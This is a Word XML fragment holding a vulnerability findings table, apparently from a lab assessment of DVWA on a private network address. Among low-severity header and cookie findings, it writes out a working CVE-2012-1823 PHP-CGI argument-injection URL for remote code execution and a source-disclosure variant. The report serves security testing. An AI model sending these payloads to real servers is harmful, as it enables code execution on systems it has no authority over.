    <w:p w14:paraId="335DD911" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="325D3EB0" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="3E3AB3CA" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5442BBD3" w14:textId="77777777" w:rsidR="00407988" w:rsidRDefault="00407988" w:rsidP="003D20B9"/>
    <w:p w14:paraId="08B5B9FB" w14:textId="77777777" w:rsidR="00407988" w:rsidRDefault="00407988" w:rsidP="003D20B9"/>
    <w:p w14:paraId="79D00A3D" w14:textId="77777777" w:rsidR="00407988" w:rsidRDefault="00407988" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6BC20058" w14:textId="77777777" w:rsidR="00407988" w:rsidRDefault="00407988" w:rsidP="003D20B9"/>
    <w:p w14:paraId="270F72F3" w14:textId="77777777" w:rsidR="00407988" w:rsidRDefault="00407988" w:rsidP="003D20B9"/>
    <w:p w14:paraId="69E9C2A2" w14:textId="77777777" w:rsidR="00407988" w:rsidRDefault="00407988" w:rsidP="003D20B9"/>
    <w:p w14:paraId="76DF162F" w14:textId="77777777" w:rsidR="00407988" w:rsidRDefault="00407988" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5AD5783B" w14:textId="77777777" w:rsidR="00407988" w:rsidRDefault="00407988" w:rsidP="003D20B9"/>
    <w:p w14:paraId="1D29F756" w14:textId="77777777" w:rsidR="00407988" w:rsidRDefault="00407988" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6DE584E5" w14:textId="77777777" w:rsidR="00407988" w:rsidRDefault="00407988" w:rsidP="003D20B9"/>
    <w:p w14:paraId="38938A18" w14:textId="77777777" w:rsidR="00407988" w:rsidRDefault="00407988" w:rsidP="003D20B9"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9174" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1622"/>
        <w:gridCol w:w="2461"/>
        <w:gridCol w:w="1142"/>
        <w:gridCol w:w="3949"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D20B9" w:rsidRPr="000E6F01" w14:paraId="4818AA3E" w14:textId="77777777" w:rsidTr="00C23FEB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1622" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E01DC9E" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Test ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2461" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4879521E" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1142" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="715035FE" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3949" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D343D19" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Target URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D20B9" w:rsidRPr="000E6F01" w14:paraId="15249FF3" w14:textId="77777777" w:rsidTr="00C23FEB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1622" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7547F545" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2461" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="649955B8" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Remote Code Execution - CVE-2012-1823</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1142" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="697A6535" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3949" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17899BA4" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId44" w:history="1">
              <w:r w:rsidRPr="000E6F01">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>http://192.168.1.27/dvwa/login.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D20B9" w:rsidRPr="000E6F01" w14:paraId="2EABA79E" w14:textId="77777777" w:rsidTr="00C23FEB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1622" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3918D7B0" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2461" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09174D70" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Source Code Disclosure - CVE-2012-1823</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1142" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E0274A3" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3949" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F417ED6" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId45" w:history="1">
              <w:r w:rsidRPr="000E6F01">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>http://192.168.1.27/dvwa/?-s</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D20B9" w:rsidRPr="000E6F01" w14:paraId="13DE0564" w14:textId="77777777" w:rsidTr="00C23FEB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1622" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A4A2401" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2461" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5953F867" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Absence of Anti-CSRF Tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1142" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="056D708C" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3949" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52835844" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId46" w:history="1">
              <w:r w:rsidRPr="000E6F01">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>http://192.168.1.27/dvwa/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D20B9" w:rsidRPr="000E6F01" w14:paraId="106A5223" w14:textId="77777777" w:rsidTr="00C23FEB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1622" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47819B41" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2461" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="522DE2DB" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Missing Anti-clickjacking Header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1142" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4564C805" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3949" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="465A4733" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId47" w:history="1">
              <w:r w:rsidRPr="000E6F01">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>http://192.168.1.27/dvwa/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D20B9" w:rsidRPr="000E6F01" w14:paraId="70437D14" w14:textId="77777777" w:rsidTr="00C23FEB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1622" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59DDBDB0" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2461" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AC2F2E3" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Cookie No </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>HttpOnly</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1142" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13ECC22A" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3949" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CE1749C" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId48" w:history="1">
              <w:r w:rsidRPr="000E6F01">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>http://192.168.1.27/dvwa/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D20B9" w:rsidRPr="000E6F01" w14:paraId="321471AF" w14:textId="77777777" w:rsidTr="00C23FEB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1622" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68226492" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2461" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A791C12" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>In Page Banner Information Leak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1142" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="633688A6" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3949" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E25254B" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId49" w:history="1">
              <w:r w:rsidRPr="000E6F01">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>http://192.168.1.27/sitemap.xml</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="000E6F01">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="555A0C55" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="35A29DC7" w14:textId="77777777" w:rsidR="003333D5" w:rsidRPr="003333D5" w:rsidRDefault="003D20B9" w:rsidP="003333D5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
